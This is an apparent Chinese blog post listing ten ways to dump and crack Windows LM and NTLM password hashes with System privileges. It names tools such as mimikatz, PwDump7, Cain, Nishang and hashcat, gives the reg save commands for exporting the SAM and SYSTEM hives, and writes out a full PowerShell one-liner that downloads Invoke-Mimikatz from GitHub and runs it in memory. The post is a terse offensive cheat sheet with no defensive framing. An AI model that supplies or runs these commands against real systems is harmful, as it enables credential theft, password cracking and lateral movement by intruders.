Windows系统LM Hash和NTLM Hash凭证获取方法速查

我超怕的 https://www.cnblogs.com/iAmSoScArEd/p/17169904.html

凭证获取需要System权限。

1、使用GetPass工具
2、使用PwDump7工具
3、使用QuarksPwDump工具（报毒）
4、使用命令导出 reg save hklm\sam sam.hive 、reg save hklm\system system.hive SAM文件
5、使用mimikatz工具读内存、自动获取本机SAM、读取4导出的文件、读取导出的lsass.exe进程的dmp文件、
6、使用Cain工具读取4中的文件
7、使用Nishang的Get-PassHashes.ps1脚本
8、使用PowerShell远程加载mimikatz powershell IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');Invoke-Mimikatz
https://github.com/PowerShellMafia/PowerSploit 也提供了多种powershell脚本
9、使用hashcat破解hash
10、解析windows的ntds.dit文件

posted @ 2023-03-07 20:40 我超怕的阅读(207) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

我超怕的

俗人昭昭，我独昏昏。俗人察察，我独闷闷。

Windows系统LM Hash和NTLM Hash凭证获取方法速查

公告